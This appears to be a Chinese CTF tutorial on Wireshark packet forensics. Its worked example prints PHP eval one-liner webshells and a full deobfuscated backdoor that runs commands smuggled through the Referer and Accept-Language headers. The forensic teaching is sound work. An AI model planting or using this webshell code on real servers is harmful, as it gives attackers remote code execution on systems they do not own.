当前位置: 首页 > news >正文

安徽网站开发项目宁波网站推广服务

安徽网站开发项目,宁波网站推广服务,男人和女人做不可描述的事情的网站,东莞网站设计风格目录 1.基本介绍 2.基本使用 1)数据包筛选: 2)筛选ip: 3)数据包还原 4)数据提取 3.wireshark实例 1.基本介绍 在CTF比赛中,对于流量包的分析取证是一种十分重要的题型。通常这类题目都是会提供一个包含…

目录

1.基本介绍

2.基本使用

1)数据包筛选:

2)筛选ip:

3)数据包还原

 4)数据提取

 3.wireshark实例


1.基本介绍

在CTF比赛中,对于流量包的分析取证是一种十分重要的题型。通常这类题目都是会提供一个包含流量数据的pcap文件,参赛选手通过该文件筛选和过滤其中无关的流量信息,根据关键流量信息找出flag或者相关线索。

pcap流量包的分析通常都是通过图形化的网络嗅探器——wireshark进行的,这款嗅探器经过众多开发者的不断完善,现在已经成为使用最为广泛的安全工具之一。接下来,斗哥来为大家讲解这款工具的基本使用。

 

2.基本使用

Wireshark的基本使用分为数据包筛选、数据包搜索、数据包还原、数据提取四个部分。

1)数据包筛选:

数据包筛选功能是wireshark的核心功能,比如需要筛选出特定的协议如HTTP,Telnet等,也可能需要筛选出ip地址,端口等。

2)筛选ip:

●源ip筛选

输入命令:ip.src == 地址

3)数据包还原

在wireshark中,存在一个交追踪流的功能,可以将HTTP或TCP流量集合在一起并还原成原始数据,具体操作方式如下:

选中想要还原的流量包,右键选中,选择追踪流 – TCP流/UPD流/SSL流/HTTP流。

 可在弹出的窗口中看到被还原的流量信息

 4)数据提取

Wireshark支持提取通过http传输(上传/下载)的文件内容,方法如下:

菜刀下载文件的流量,需要删除分组字节流前开头和结尾的X@Y字符,否则下载的文件会出错。鼠标右键点击 – 选中 显示分组字节…

 在弹出的窗口中设置开始和结束的字节(原字节数开头加3,结尾减3)

 最后点击save as按钮导出。

导出结果:

 

 3.wireshark实例

题目要求:

1.黑客第一次获得的php木马的密码是什么

2.黑客第二次上传php木马是什么时间

3.第二次上传的木马通过HTTP协议中的哪个头传递数据

题目要求php木马的密码,首先我们要知道php一句话木马一般都是POST请求

所以我们直接过滤POST请求,发现这个IP请求了一个名为kkkaaa.php的php文件,很可疑

正常文件不会以此命名的, 打开数据包看一下,发现了这个字段

Form item: "zzz" = "@eval(base64_decode($_POST[z0]));"

 

上传的木马应该是:<?php eval($_POST['zzz']);?>

又将eval(base64_decode($_POST[z0]));传入zzz参数,目的是将z0传入的数据进行base64的解码此时z0传入base64编码后的数据,便可以执行恶意代码解码后发现执行了dirname函数,目的是查看当前路径下的文件或目录,类似linux下的ls命令

PHP代码是通过混淆过的,让我们根本看不懂他的代码

 还原后的代码:

<?php
$kh = "cb42";
$kf = "e130";
function x($t, $k)
{$c = strlen($k);$l = strlen($t);$o = "";for ($i = 0; $i < $l;) {for ($j = 0; ($j < $c && $i < $l); $j++, $i++) {$o .= $t{$i} ^ $k{$j};}}return $o;
}$r = $_SERVER;
$rr = @$r["HTTP_REFERER"];
$ra = @$r["HTTP_ACCEPT_LANGUAGE"];
if ($rr && $ra) {$u = parse_url($rr);parse_str($u["query"], $q);$q = array_values($q);preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/", $ra, $m);if ($q && $m) {@session_start();$s =& $_SESSION;$ss = "substr";$sl = "strtolower";$i = $m[1][0] . $m[1][4];$h = $sl($ss(md5($i . $kh), 0, 3));$f = $sl($ss(md5($i . $kf), 0, 3));$p = "";for ($z = 1; $z < count($m[1]); $z++) $p .= $q[$m[2][$z]];if (strpos($p, $h) === 0) {$s[$i] = "";$p = $ss($p, 3);}if (array_key_exists($i, $s)) {$s[$i] .= $p;$e = strpos($s[$i], $f);if ($e) {$k = $kh . $kf;ob_start();@eval(@gzuncompress(@x(@base64_decode(preg_replace(array("/_/", "/-/"), array("/", "+"), $ss($s[$i], 0, $e))), $k)));$o = ob_get_contents();ob_end_clean();$d = base64_encode(x(gzcompress($o), $k));print("<$k>$d</$k>");@session_destroy();}}}
}
?>

 这个函数在8.0已经被移除,并且和eval()函数有同样的安全隐患

 木马要利用,就必然会与数据包进行交互,仔细看看这两行代码

 

$rr = @$r["HTTP_REFERER"];
$ra = @$r["HTTP_ACCEPT_LANGUAGE"];

获取http请求中的referer和accept_language字段的,与数据包产生了交互,所以可以基本断定这两个字段是黑客用来传输他想执行的命令的.我们随便看一个访问footer.php的包

 所以木马通过HTTP协议中的referer头传递数据

http://www.yayakq.cn/news/748811/

相关文章:

  • 域名对网站排名的影响科技创新小发明
  • wordpress怎么建立二级域名360seo
  • 网站正能量视频不懂我意思吧佛山学校网站建设
  • 点瑞网络网站建设天翼云主机 网站
  • 韩国网站后缀济宁网站建设优惠
  • 怎么建设属于自己的网站做暧暧视频网站免费
  • 建个普通网站多少钱购买的网站怎么看网站空间大小
  • 织梦栏目页不显示网站描述第一ppt网站官网
  • 烟台网站建设方案托管网址外链平台
  • psd网站首页图片商务网站规划与网页制作
  • 怎么选择宜昌网站建设镇江软件公司
  • 上海快速建站平台河南住房和城乡建设部网站
  • 搭配服装网站源码河南网站建设
  • 公司网站建设维护的岗位陕西网站开发哪家好
  • .网站链接策略网站建设一条龙全包seo
  • 无锡大型网站建设公司wordpress视频类模板下载
  • asp.net网站开发期末复习题什么网页可以做网站
  • 参考消息官方网站阅读个体户可以网站备案吗
  • 做一般的公司门户网站投资额河北邯郸最新消息
  • 免费做宣传的网站是我现在有域名怎么做网站
  • 仓山区城乡建设局网站哪个网站做海南二手房
  • 网站开发发展前景国外网站服务器
  • 杨和勒流网站建设怎么是营销型网站建设
  • 北京 网站 外包服务器租用相关网站
  • 有漏洞的网站建大型网站需要多少钱
  • 凡科建站视频教程jquery 素材的网站
  • 通辽网站建设wordpress幻灯片满屏
  • 潜江网站设计公司vs2013网站开发
  • html5国内网站欣赏做ic什么网站好
  • 北京网站建设 云智互联腾讯学生服务器可以做网站吗